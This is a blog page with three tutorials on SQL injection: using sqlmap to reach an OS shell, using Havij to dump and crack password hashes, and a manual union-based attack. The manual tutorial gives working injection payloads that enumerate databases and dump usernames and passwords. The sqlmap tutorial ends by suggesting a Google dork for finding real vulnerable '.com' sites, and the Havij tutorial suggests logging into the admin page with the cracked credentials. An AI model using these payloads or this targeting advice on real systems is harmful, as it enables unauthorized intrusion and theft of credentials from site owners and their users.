Posted on 2 Comments

SQL Injection with Sqlmap : Step by step guide

Hi Friends. Today we will see how to perform SQL injection with  sqlmap. Sqlmap  is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers “. It is pre-installed in Kali Linux. For this tutorial I am using Vulnerawa as target and it is necessary to setup a webapp pentest lab with it. See how to set up a webapp pentest lab.

If the webapp pentest lab is all ready. Open the browser in Kali linux and type the address as shown below.( the ip address may differ for you ). You should see the Vulnerawa web page as shown below. Click on “About”.

The below webpage will open. It shows about the founders of Vulnerawa.

Click on “founder 1”. It will show brief details about him as shown below.

Similarly go back and click on “Founder 2” and “Founder 3”. The result will be as below.  Now if you have observed, the “id” parameter in the URL changes as we click on different users. For founder 1, it is 1 and sequentially.

Now introduce a single quote( ‘ ) character in the URL. after the number as shown below.

Click on “Enter” and the page will show an error as shown below. “You have an error as shown below……..”. This is a clear sign that the webpage is vulnerable to SQL injection.

Now open SQLmap from the path as shown below.

Now copy the vulnerable url and type the following command the terminal. Here -u stands for url.

The result will be as shown below. It will reveal the website technology and the scripting language used.

Now let’s grab the banner of the website. Type the following command and hit “Enter”.

You can see the banner as shown below.

To see the current user of the website, type the following command.

The current user  can be seen as below.

Now let us see the current database used by the website. Type the following command.

We can see that the current database is “Vulneraw”.

Now let us see all the tables present in the database “Vulneraw” by using following command.

We see that we have only one table in the current database. The table is “users”.

Now lets see the number of columns in the table “users”. Type the following command.

We see there are four columns in table “users”.

Now let’s dump the values of two columns username and password by typing the following command.

The result is as below. we got the username and passwords.

\

If we want to dump all the entries of the table, type the following command.

Here are the entries.

Now let’s see if we are lucky enough to get the shell of the target. Shell is the target machine’s command line or terminal. Type the following command.

It will prompt us to enter the application language being used by the website. We already know it is PHP. Enter its value. Next it will prompt you to enter the writable directory. You cam choose your option wisely. I chose the default root directory for Wamp server. Hit on “Enter”.

I successfully got the os-shell. Now let’s try some commands. Type “dir” to see the contents  of the root directory. It works as shown below.

Let’s see how many users are there on the system. Type the command “net user” . We can see the users listed as below. Happy hacking practice.

To find sites vulnerable to this sql injection use google dork “site:.com inurl:id=1” or similar dorks. That’s all in this tutorial. See how sql injection works.

Posted on 20 Comments

SQL injection with Havij : Step by step guide

NOTE : This is strictly for educative purposes.

Havij is an automated SQL injection tool. To say in the own words of its creators,

” Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. ”

It is available both in free and commercial versions. Today we are going to see how to dump the contents of a database using Havij. For this I am going to use the free version. First download Havij from here and install it. Then open it and enter the vulnerable page url in the target column ( for this tut I am using my own vulnerable webpage ).

Set the database option to ‘auto detect‘ and hit analyze. This should show you the current database name as shown below.

Click on the “info” tab. This will show you information about the victim’s system. We can see information like Host IP address, web server version etc.

Click on the “Tables” tab.

Click on “Get DBs” option. This will list all the databases as shown below.

To get tables in a specific database, select the database and click on Get Tables”. This will list all the tables present in the selected database. I selected database “shunya” here.

We can see that there is on table ‘users’ in our database ‘shunya’ .To get columns , select the table ‘ users’ and click on “Get Columns”.

This will list all the columns in the table. We can see that we have five columns in the table ‘users’.all the columns. It’s time to dump the values of columns. Select the columns whose data we want to dump and click on Get data”. Here I selected all the columns.

We got all the data including usernames and passwords. But passwords seem to be encrypted. No problem. Click on the password hashes and copy them. Then click on MD5″ tab and paste the password. Click on “Start”. Havij automatically decrypts the password for us. Decrypt all passwords in the similar manner.

Click on “Find admin”. This option finds the admin  page of the website automatically. When it finds the admin page, you can try the username and passwords to get access to the website. Hope this was helpful.

Here’s a video version of this howto.

Posted on 2 Comments

SQL Injection tutorial for beginners

There are many articles on internet on SQL injection but most of them only give you queries and don’t display the ensuing result. So here, I have decided to bring a SQL injection tutorial for beginners. For this, I have made my own webpage vulnerable to SQL injection and hosted it on Wamp server.  I hope this will be helpful for beginners to understand SQL injection.

Imagine any hacker searching for SQL vulnerable sites using google dorks comes to this website shown below.

The above is a webpage displaying some sort of information about the company’s founders.  What happens when we click on “Founder 1″? It displays some information about Founder 1 as shown below.

Notice that there is a small change in the url. it says id=1 at the last.  Now what if we go back and click on “Founder 2”,  it displays information about founder 2 and the url changes to ‘id=2. This implies that the webpage is using PHP $_GET query to fetch data from database.

Well let’s see if the webpage is vulnerable. In the address bar, add a single quote after the id=1. like below

“id=1”

If you get an error as shown above, then the site is vulnerable to sql injection. Since we know this site is vulnerable to sql injection, lets’ see the number of columns in the database. Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value without the error are the number of columns present. The ‘order by’ query in SQL is used to sort the data. When no option is specified it sorts in ascending order by default. Sometimes you may not see any error no matter how much you increase the value, like the case below where I have not received an error until the value of 15.

Maybe there are fifteen columns ( the chances are very low though) or our query is not working. Let’s use another query.

id=1′ order by 1–+ 

We can see below that the value 3 returns us an error like below. This means there are two columns.

If the latter query works then you should use it all through the injection. The characters ‘–‘ comment the code after them.

Now we know there are  two columns. Let’s find out the vulnerable columns in the website. Type

id=-1′ union select 1,2–+ 

The vulnerable columns are displayed as below. Here both the columns are vulnerable but you may not be so lucky all the time.

If the above query doesn’t work, use

id=1′ and 1=2 union select 1,2–+

Now let’s find out the database version. We already know the number of columns. Use query,

id=-1′ union select version(),2–+

The version is 5.6.2-log. Now let’s find out the names of all the databases present. Use query,

id=-1′ union select group_concat(schema_name),2 from information_schema.schemata–+

This will display all the databases. You can see the list of databases present below. You can see dvwa database which I used earlier for practice.

We know all the databases. Now let’s see the database being used by our website. Use query,

id=-1′ union select database(),2–+

So, Shunya is the database being used by our website. Let’s see the current user.

id=-1′ union select user(),2–+

We know root is the default user on wamp server. Now let’s find out tables present in the ‘shunya’ database.

id=-1′ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()–+

The table name is ‘users’. Now let’s find out the column names in the table ‘users’.

id=-1′ union select group_concat(column_name),2 from information_schema.columns where table_schema=database()–+

We got the column names. Now let’s dump the values of some interesting columns. Let’s dump “username” and “password” values.

id=-1′ union select group_concat(username,0x3a,password,0x3a),2 from users–+

We successfully dumped the usernames and passwords. The value 0x3a introduces a colon between the dumped values for readability. Now let’s dump all the values from the table ‘users’.

id=-1′ union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password,0x3a,),2 from users–+

We have successfully performed SQL injection and dumped the values. That’s all in this SQL injection tutorial for beginners. Since you have understood basic concept of SQL injection, also see how to exploit sql injection with Havij and Sqlmap.